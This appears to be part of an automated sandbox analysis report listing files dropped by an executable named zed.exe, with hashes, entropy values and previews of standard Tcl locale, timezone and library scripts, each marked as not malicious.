                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1471
                                                                                                                                                                                                                                            Entropy (8bit):4.44729506678271
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR836DNjYTP55YAUy2tJ9kyzW68IFYHMBSW1K1pvhv1O:43dbYJyC8ySgI1dV1O
                                                                                                                                                                                                                                            MD5:C127F54C462917D3B3EEF5F29F612138
                                                                                                                                                                                                                                            SHA1:B1D9A67F856D93F98524C6372B352EA0DE1B9CD3
                                                                                                                                                                                                                                            SHA-256:E9B7AECD456F1D2288604C982B5DED0DCF71DCA968C0B0EAFF4CA16CC3B73EC2
                                                                                                                                                                                                                                            SHA-512:0B0F132F10580751258D37E070338C3B39DF57FDECDB9D0AFA67E90D6766DDCB4D711876E551ED759D177F1B8F4E9E1DD8F7899F7CB57F8039F55EC4C2984E87
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset vi DAYS_OF_WEEK_ABBREV [list \.. "Th 2"\.. "Th 3"\.. "Th 4"\.. "Th 5"\.. "Th 6"\.. "Th 7"\.. "CN"].. ::msgcat::mcset vi DAYS_OF_WEEK_FULL [list \.. "Th\u01b0\u0301 hai"\.. "Th\u01b0\u0301 ba"\.. "Th\u01b0\u0301 t\u01b0"\.. "Th\u01b0\u0301 n\u0103m"\.. "Th\u01b0\u0301 s\u00e1u"\.. "Th\u01b0\u0301 ba\u0309y"\.. "Chu\u0309 nh\u00e2\u0323t"].. ::msgcat::mcset vi MONTHS_ABBREV [list \.. "Thg 1"\.. "Thg 2"\.. "Thg 3"\.. "Thg 4"\.. "Thg 5"\.. "Thg 6"\.. "Thg 7"\.. "Thg 8"\.. "Thg 9"\.. "Thg 10"\.. "Thg 11"\.. "Thg 12"\.. ""].. ::msgcat::mcset vi MONTHS_FULL [list \.. "Th\u00e1ng m\u00f4\u0323t"\.. "Th\u00e1ng hai"\.. "Th\u00e1ng ba"\.. "Th\u00e1ng t\u01b0"\.. "Th\u00e
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1598), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3385
                                                                                                                                                                                                                                            Entropy (8bit):4.5164095151631125
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:43qrY2BBT7uxDqwPqDa8c3FLbYmhyvMDKbW0YGLuoEyke2gdr:2yPTKdo
                                                                                                                                                                                                                                            MD5:2F356DE14D48B1091DEAA32D20C38D96
                                                                                                                                                                                                                                            SHA1:4AB78D47A73290000955A7C1DFDF7106093F69FD
                                                                                                                                                                                                                                            SHA-256:EB247F5184A59414D3DF7E3ECA51F5998C248CFB27D2C02E62A7A30AB35197A7
                                                                                                                                                                                                                                            SHA-512:602410830018B455C68AE2EBDD83BA561CF59DA5898E00C80CE7EF619912E591EB38B4C8FE8D9B1F024E7105B0C4D2D326FC855F31E79C1B954429B947DFFBB1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh DAYS_OF_WEEK_ABBREV [list \.. "\u661f\u671f\u65e5"\.. "\u661f\u671f\u4e00"\.. "\u661f\u671f\u4e8c"\.. "\u661f\u671f\u4e09"\.. "\u661f\u671f\u56db"\.. "\u661f\u671f\u4e94"\.. "\u661f\u671f\u516d"].. ::msgcat::mcset zh DAYS_OF_WEEK_FULL [list \.. "\u661f\u671f\u65e5"\.. "\u661f\u671f\u4e00"\.. "\u661f\u671f\u4e8c"\.. "\u661f\u671f\u4e09"\.. "\u661f\u671f\u56db"\.. "\u661f\u671f\u4e94"\.. "\u661f\u671f\u516d"].. ::msgcat::mcset zh MONTHS_ABBREV [list \.. "\u4e00\u6708"\.. "\u4e8c\u6708"\.. "\u4e09\u6708"\.. "\u56db\u6708"\.. "\u4e94\u6708"\.. "\u516d\u6708"\.. "\u4e03\u6708"\.. "\u516b\u6708"\.. "\u4e5d\u6708"\.. "\u5341\u6708"\.. "\u5341\u4e00\u6708"\.. "\u5341\u4e8c\u6708"\.. ""].. ::msgcat::m
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):319
                                                                                                                                                                                                                                            Entropy (8bit):5.167825099880243
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoX5YBoHJ+3vtfNrsoHJ+3v6MYBoXa+3vYq9vn:4EnLB383U5YMJ+3vtN3J+3v6LcL3vYqN
                                                                                                                                                                                                                                            MD5:9FCDC2E80E13984D434E3CC91E1ED14C
                                                                                                                                                                                                                                            SHA1:710D9EE2A71021F4AB609886138EED43C1380ACD
                                                                                                                                                                                                                                            SHA-256:4C8A855700FEFE8EE21B08030FF4159D8011AE50353F063229C42DE6292475CF
                                                                                                                                                                                                                                            SHA-512:D899A1F58DF1051BB2C2C4AC859C52A2D19B1593C37022A29439B37A8057ADC3941F3564E2E1D9CEB72AE123A4E12E24C3736343AA3A5EC8749AB5AEBBF65085
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_CN DATE_FORMAT "%Y-%m-%e".. ::msgcat::mcset zh_CN TIME_FORMAT "%k:%M:%S".. ::msgcat::mcset zh_CN TIME_FORMAT_12 "%P%I\u65f6%M\u5206%S\u79d2".. ::msgcat::mcset zh_CN DATE_TIME_FORMAT "%Y-%m-%e %k:%M:%S %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):780
                                                                                                                                                                                                                                            Entropy (8bit):4.716025632367214
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:4EnLB383HmSBBHZovDh4ToC4qU3WwVW3v6P3v3WwSn:4aR83Hxo14u3Ww+viv3WwS
                                                                                                                                                                                                                                            MD5:CFDA7B6463305FA15DBBA72D725A1876
                                                                                                                                                                                                                                            SHA1:2BF885073FBAF4A38B7AFDA76CA391F195A5A362
                                                                                                                                                                                                                                            SHA-256:7E1C5BD9EC1A17BB851B0DCABD0DFA9FF9D64B89603D9D3FBEAAC609172346AE
                                                                                                                                                                                                                                            SHA-512:55F974C706933ECE0575A33C381D9B370B8A408C5C5514C805EC04C8B0CA5BAFAA47267DA98E1805B478A9589FFB7549D79002B2A7AF387049011D78DD7605B6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_HK DAYS_OF_WEEK_ABBREV [list \.. "\u65e5"\.. "\u4e00"\.. "\u4e8c"\.. "\u4e09"\.. "\u56db"\.. "\u4e94"\.. "\u516d"].. ::msgcat::mcset zh_HK MONTHS_ABBREV [list \.. "1\u6708"\.. "2\u6708"\.. "3\u6708"\.. "4\u6708"\.. "5\u6708"\.. "6\u6708"\.. "7\u6708"\.. "8\u6708"\.. "9\u6708"\.. "10\u6708"\.. "11\u6708"\.. "12\u6708"\.. ""].. ::msgcat::mcset zh_HK DATE_FORMAT "%Y\u5e74%m\u6708%e\u65e5".. ::msgcat::mcset zh_HK TIME_FORMAT_12 "%P%I:%M:%S".. ::msgcat::mcset zh_HK DATE_TIME_FORMAT "%Y\u5e74%m\u6708%e\u65e5 %P%I:%M:%S %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):347
                                                                                                                                                                                                                                            Entropy (8bit):5.062880051437783
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoOpEoPpFocMohX3v6Zwoh+3v6fxvn:4EnLB383J53v6O3vCn
                                                                                                                                                                                                                                            MD5:3218F8E6BEDD534277DE0849C423158E
                                                                                                                                                                                                                                            SHA1:10C006446A10406A5644C4033665E877EBF72AF7
                                                                                                                                                                                                                                            SHA-256:500546B3211D454659D845B4AB9AEF226125100DF40407C49530DE17CDD4363F
                                                                                                                                                                                                                                            SHA-512:3142893DA85BA8F83A5B6851B313B5F5FF80D2B989C1AE015665EE70373249B44EFB4FF7C621F1D8F37AC6019EF5E8D6D21C76C48998C3D9072F9C5060AA8813
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_SG AM "\u4e0a\u5348".. ::msgcat::mcset zh_SG PM "\u4e2d\u5348".. ::msgcat::mcset zh_SG DATE_FORMAT "%d %B %Y".. ::msgcat::mcset zh_SG TIME_FORMAT_12 "%P %I:%M:%S".. ::msgcat::mcset zh_SG DATE_TIME_FORMAT "%d %B %Y %P %I:%M:%S %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):354
                                                                                                                                                                                                                                            Entropy (8bit):5.124064818715749
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoAykaRULH/XRxy/5oAyjZRULHi5oAyU/G0OMoAyxW3v6ZQ:4EnLB38315xDOiKRRW3v6F3v8A2n
                                                                                                                                                                                                                                            MD5:9010E34791B5DDB7F1E0AD4DA6BD4623
                                                                                                                                                                                                                                            SHA1:418F7374BABEF27FEC8E00D3A32F535084593AB9
                                                                                                                                                                                                                                            SHA-256:DBA0584B8E1925B439F06E0BF0965E97AFB7EB39E70E0E4C9B70769EBC5F996C
                                                                                                                                                                                                                                            SHA-512:D3AB698B725E84DAB06E472C41FF2EB55D63885D22B4598C596800BAC83A02A44CB524524F267D090952AF7E0031F47720786ACF9E354EF672CF9EEFB7DB3BD4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_TW BCE "\u6c11\u570b\u524d".. ::msgcat::mcset zh_TW CE "\u6c11\u570b".. ::msgcat::mcset zh_TW DATE_FORMAT "%Y/%m/%e".. ::msgcat::mcset zh_TW TIME_FORMAT_12 "%P %I:%M:%S".. ::msgcat::mcset zh_TW DATE_TIME_FORMAT "%Y/%m/%e %P %I:%M:%S %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):33777
                                                                                                                                                                                                                                            Entropy (8bit):4.60013086740989
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:4D0xrpIuhenN4kA0G6sRcl5AdtsPLKiF64aJQ2L:HpnhsS9C5Adqua5aJvL
                                                                                                                                                                                                                                            MD5:4ECD97188BFED58A15FE22EC566FA6A3
                                                                                                                                                                                                                                            SHA1:6E4E91096298F1A0AE6CD4241F167C8B4F661EE5
                                                                                                                                                                                                                                            SHA-256:67A157F1873D606B53DC4D894BD8E71F6B1A0DD66177B9513BD039B348B40349
                                                                                                                                                                                                                                            SHA-512:1D5067BBB13DAB001168EEB41EBFA2D13BACB0F43A8067CC93923E8F4D062AA387DA23D7D98D6A2AE77D7C849A6026F2343102CBE03690C2CEA0890222339475
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# optparse.tcl --..#..# (private) Option parsing package..# Primarily used internally by the safe:: code...#..#.WARNING: This code will go away in a future release..#.of Tcl. It is NOT supported and you should not rely..#.on it. If your code does rely on this package you..#.may directly incorporate this code into your application.....package require Tcl 8.5-..# When this version number changes, update the pkgIndex.tcl file..# and the install directory in the Makefiles...package provide opt 0.4.8....namespace eval ::tcl {.... # Exported APIs.. namespace export OptKeyRegister OptKeyDelete OptKeyError OptKeyParse \.. OptProc OptProcArgGiven OptParse \... Lempty Lget \.. Lassign Lvarpop Lvarpop1 Lvarset Lvarincr \.. SetMax SetMin......################# Example of use / 'user documentation' ###################.... proc OptCreateTestProc {} {.....# Defines ::tcl::OptParseTest as a test proc with parsed arguments...# (can't be d
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):620
                                                                                                                                                                                                                                            Entropy (8bit):4.702477618616754
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:jHxIRu9zhjJS42wbGlTULuUAZb3KykszLYIGbyAkXaqrQ+pBb6:biRUJS42wbGlTUcZ+yk2LY0XaqrB4
                                                                                                                                                                                                                                            MD5:07532085501876DCC6882567E014944C
                                                                                                                                                                                                                                            SHA1:6BC7A122429373EB8F039B413AD81C408A96CB80
                                                                                                                                                                                                                                            SHA-256:6A4ABD2C519A745325C26FB23BE7BBF95252D653A24806EB37FD4AA6A6479AFE
                                                                                                                                                                                                                                            SHA-512:0D604E862F3A1A19833EAD99AAF15A9F142178029AB64C71D193CEE4901A0196C1EEDDC2BCE715B7FA958AC45C194E63C77A71E4BE4F9AEDFD5B44CF2A726E76
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Tcl package index file, version 1.1..# This file is generated by the "pkg_mkIndex -direct" command..# and sourced either when an application starts up or..# by a "package unknown" script. It invokes the..# "package ifneeded" command to set up package-related..# information so that packages will be loaded automatically..# in response to "package require" commands. When this..# script is sourced, the variable $dir must contain the..# full path name of this file's directory.....if {![package vsatisfies [package provide Tcl] 8.5-]} {return}..package ifneeded opt 0.4.8 [list source [file join $dir optparse.tcl]]..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):23995
                                                                                                                                                                                                                                            Entropy (8bit):4.884828325514459
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:8xgjLNILEHsdAW2UfnImRqXqux6XmihmCchzPLrXJjJh6PLfzdklG:8xgjLNImsdnvIm86uGLhLchzDzJ9h6Dn
                                                                                                                                                                                                                                            MD5:DDB0AB9842B64114138A8C83C4322027
                                                                                                                                                                                                                                            SHA1:ECCACDC2CCD86A452B21F3CF0933FD41125DE790
                                                                                                                                                                                                                                            SHA-256:F46AB61CDEBE3AA45FA7E61A48930D64A0D0E7E94D04D6BF244F48C36CAFE948
                                                                                                                                                                                                                                            SHA-512:C0CF718258B4D59675C088551060B34CE2BC8638958722583AC2313DC354223BFEF793B02F1316E522A14C7BA9BED219531D505DE94DC3C417FC99D216A01463
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# package.tcl --..#..# utility procs formerly in init.tcl which can be loaded on demand..# for package management...#..# Copyright (c) 1991-1993 The Regents of the University of California...# Copyright (c) 1994-1998 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....namespace eval tcl::Pkg {}....# ::tcl::Pkg::CompareExtension --..#..# Used internally by pkg_mkIndex to compare the extension of a file to a given..# extension. On Windows, it uses a case-insensitive comparison because the..# file system can be file insensitive...#..# Arguments:..# fileName.name of a file whose extension is compared..# ext..(optional) The extension to compare against; you must..#..provide the starting dot...#..Defaults to [info sharedlibextension]..#..# Results:..# Returns 1 if the extension matches, 0 otherwise....proc tcl::Pkg::CompareExtension {fileName {ext {}}} {.. global tcl_platfor
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):844
                                                                                                                                                                                                                                            Entropy (8bit):4.883013702569192
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:TF7S2n2wn2SNHaeYF9xcwrmXhbs1GUiSYX3EtSK78ex4VIpynEw88/McUBbPgnz:TF7Hn2wnlk2KwyZSM4SkV/3UB7Cz
                                                                                                                                                                                                                                            MD5:577787C2F4F5956BA70F83012B980AE5
                                                                                                                                                                                                                                            SHA1:040B2469F796F3FDFCD1E1DD2EB1C5B799EDEF62
                                                                                                                                                                                                                                            SHA-256:E269029C8263E3CBC1920C3604ECDCF15EDCCB208A0D68F9EB42B73954D620C0
                                                                                                                                                                                                                                            SHA-512:C2940F6F3D77412EFC537B8AB67352F519DFFA95739FCC17BF1817335AFD9E5BFE91ABE98CBA99E278CB4923D4E6D431ED9D72282745203C0F7D73193F550238
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# parray:..# Print the contents of a global array on stdout...#..# Copyright (c) 1991-1993 The Regents of the University of California...# Copyright (c) 1994 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....proc parray {a {pattern *}} {.. upvar 1 $a array.. if {![array exists array]} {...return -code error "\"$a\" isn't an array".. }.. set maxl 0.. set names [lsort [array names array $pattern]].. foreach name $names {...if {[string length $name] > $maxl} {... set maxl [string length $name]...}.. }.. set maxl [expr {$maxl + [string length $a] + 2}].. foreach name $names {...set nameString [format %s(%s) $a $name]...puts stdout [format "%-*s = %s" $maxl $nameString $array($name)].. }..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):42223
                                                                                                                                                                                                                                            Entropy (8bit):4.822635446297551
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:H/Jo8y7AyARYhZfc3njlVdRIp4xOtoYx4WneNiBq5vIhfwEaqadlUCJ2Pbb1P6:H/c7AmhZmnjvdRIG924WneNiBq5+fwEc
                                                                                                                                                                                                                                            MD5:B8C1561D471CFBF4111C706411D59883
                                                                                                                                                                                                                                            SHA1:71483EAEEF377EE9AF90BEC44F70C7B12C5BC720
                                                                                                                                                                                                                                            SHA-256:C21DCE3AB31893118BBED01E559070F1D3541877FEE331BD45F5BF4300ED9654
                                                                                                                                                                                                                                            SHA-512:465065A938C71AF4588B3331B51A62DD57F57492EB1CB6C0F52B9FD0A2FE7A54B1E995AA56E4A41D7A99EAFF665C1E23E3B240FB3F9840AB242C21B1DBFFFF45
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# safe.tcl --..#..# This file provide a safe loading/sourcing mechanism for safe interpreters...# It implements a virtual path mechanism to hide the real pathnames from the..# child. It runs in a parent interpreter and sets up data structure and..# aliases that will be invoked when used from a child interpreter...#..# See the safe.n man page for details...#..# Copyright (c) 1996-1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES.....#..# The implementation is based on namespaces. These naming conventions are..# followed:..# Private procs starts with uppercase...# Public procs are exported and starts with lowercase..#....# Needed utilities package..package require opt 0.4.8....# Create the safe namespace..namespace eval ::safe {.. # Exported API:.. namespace export interpCreate interpInit interpConfigure interpDelete \...interpAddToAccessPath interpFindInAccessPath setL
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5617
                                                                                                                                                                                                                                            Entropy (8bit):4.747404679682368
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:eOaVhNUMUuUQU2UsUIUbUEUEeUkgU6UWSO0DT5RTdcvsilrvs+jscMK57ehXowrz:ejVHRRLP3LWDXewTbSO0DT5RTdcvsilg
                                                                                                                                                                                                                                            MD5:C62FB22F4C9A3EFF286C18421397AAF4
                                                                                                                                                                                                                                            SHA1:4A49B8768CFF68F2EFFAF21264343B7C632A51B2
                                                                                                                                                                                                                                            SHA-256:DDF7E42DEF37888AD0A564AA4F8CA95F4EEC942CEBEBFCA851D35515104D5C89
                                                                                                                                                                                                                                            SHA-512:558D401CB6AF8CE3641AF55CAEBC9C5005AB843EE84F60C6D55AFBBC7F7129DA9C58C2F55C887C3159107546FA6BC13FFC4CCA63EA8841D7160B8AA99161A185
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Tcl autoload index file, version 2.0..# -*- tcl -*-..# This file is generated by the "auto_mkindex" command..# and sourced to set up indexing information for one or..# more commands. Typically each line is a command that..# sets an element in the auto_index array, where the..# element name is the name of a command and the value is..# a script that loads the command.....set auto_index(auto_reset) [list source [file join $dir auto.tcl]]..set auto_index(tcl_findLibrary) [list source [file join $dir auto.tcl]]..set auto_index(auto_mkindex) [list source [file join $dir auto.tcl]]..set auto_index(auto_mkindex_old) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::init) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::cleanup) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::mkindex) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::hook) [list source [file join $dir auto.t
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):12204
                                                                                                                                                                                                                                            Entropy (8bit):4.763796758810551
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:55CjnlRfMKqaOH5bE2KjNkkpgpCmqkkuowUh9PTYMsvSO+xy8h/vuKisM68E:5q3MKYH5bE1jNkkpgomq/uCPTYMC+k83
                                                                                                                                                                                                                                            MD5:215262A286E7F0A14F22DB1AA7875F05
                                                                                                                                                                                                                                            SHA1:66B942BA6D3120EF8D5840FCDEB06242A47491FF
                                                                                                                                                                                                                                            SHA-256:4B7ED9FD2363D6876092DB3F720CBDDF97E72B86B519403539BA96E1C815ED8F
                                                                                                                                                                                                                                            SHA-512:6ECD745D7DA9D826240C0AB59023C703C94B158AE48C1410FAA961A8EDB512976A4F15AE8DEF099B58719ADF0D2A9C37E6F29F54D39C1AB7EE81FA333A60F39B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# -*- tcl -*-..#..# Searching for Tcl Modules. Defines a procedure, declares it as the primary..# command for finding packages, however also uses the former 'package unknown'..# command as a fallback...#..# Locates all possible packages in a directory via a less restricted glob. The..# targeted directory is derived from the name of the requested package, i.e...# the TM scan will look only at directories which can contain the requested..# package. It will register all packages it found in the directory so that..# future requests have a higher chance of being fulfilled by the ifneeded..# database without having to come to us again...#..# We do not remember where we have been and simply rescan targeted directories..# when invoked again. The reasoning is this:..#..# - The only way we get back to the same directory is if someone is trying to..# [package require] something that wasn't there on the first scan...#..# Either..# 1) It is there now: If we rescan, you get it; if not you don
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):147
                                                                                                                                                                                                                                            Entropy (8bit):4.995501022397479
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/2DcsBdNMXGm2OHnFvpsYoHsdSalHFLwy:SlSWB9eg/2DBpDm2OHnFvmYoH1alHOy
                                                                                                                                                                                                                                            MD5:FF8B5540631A6EE93507338C4E7AA49D
                                                                                                                                                                                                                                            SHA1:817B261A1B6B92AA498EC286349964EA10FB5A84
                                                                                                                                                                                                                                            SHA-256:7213997BB9CF9D384A7002B8C8EFEF25C01ABA6083D9835A16D583D5DCEE40A0
                                                                                                                                                                                                                                            SHA-512:8D78AC4868ED0013EDA536C0E82E0E91398772AA18C637AEFE22F24B142FCDA55A4CB853B2282951E907C9E2F62BD3F831A5CF995F52898F5225D16889943A9C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Abidjan) {.. {-9223372036854775808 -968 0 LMT}.. {-1830383032 0 0 GMT}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):183
                                                                                                                                                                                                                                            Entropy (8bit):4.832432925672155
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2Dc9XfBQDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DUGDBS
                                                                                                                                                                                                                                            MD5:52FDFD3DB98475FBBB620D0D5565C5CC
                                                                                                                                                                                                                                            SHA1:C7750452859663605272553DBEE0B6C134E1517C
                                                                                                                                                                                                                                            SHA-256:6040827AFED8CEF45F252FBD7E3E862C0B5E9D06C1C98C58BAD61DFE67BD57CC
                                                                                                                                                                                                                                            SHA-512:2FF9D96D81279148A86BE208FEEACCBCB8B4224D093D6C092ECD1C4EA2186589CCF947027D3A726600C703611B4CFEE029AA14ED3E8593C477B427C4F342CF27
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Accra) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):189
                                                                                                                                                                                                                                            Entropy (8bit):4.817170256300069
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DczqIVDcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DnaDkO
                                                                                                                                                                                                                                            MD5:30CDD4D37E9DD60FBF6D754C9343F364
                                                                                                                                                                                                                                            SHA1:56F896C21068764B7B8F884F374B18913CA3D9CA
                                                                                                                                                                                                                                            SHA-256:E11FD8AD8572B684333810CFDC23B92E1ACF619875866985E288D92F8277D07F
                                                                                                                                                                                                                                            SHA-512:78FC8043CCE25713404E70996229E5EA8238BF5C0F59029064EDA5494E2D4F54398931F3D855E30C82B2C53B789C40EE4CBF09D0F98C2BA6734595D4AA75017A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Addis_Ababa) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1080
                                                                                                                                                                                                                                            Entropy (8bit):4.187497782275587
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB862D7nmdHh5Cv6/lHY8SOSuvvzXipFSgSO5vW5aKmvbsF6VWsXN87QBWcAFy:5veSvKlHYXNujXipFSjKRKXiWsXCGWJy
                                                                                                                                                                                                                                            MD5:E8D3DF11CE0E7575485573FA07D955D5
                                                                                                                                                                                                                                            SHA1:3B2C00C85B6C0BFAA1C676C970D6DF1B4BDC3D4A
                                                                                                                                                                                                                                            SHA-256:E6874647561CE1C5FD1F650C9B167F77AC5B24FD2026046399A9043CF998E5C4
                                                                                                                                                                                                                                            SHA-512:E2968BE847622CF243C0E498436FD21BDC2E1DF0FD8D694F2C70569D17CE896CDE4968BB8ABDEF9F687439E4EA2D955AE87D6C15E81F881EE1413416A90765D4
                                                                                                                                                                                                                                            Malicious:false
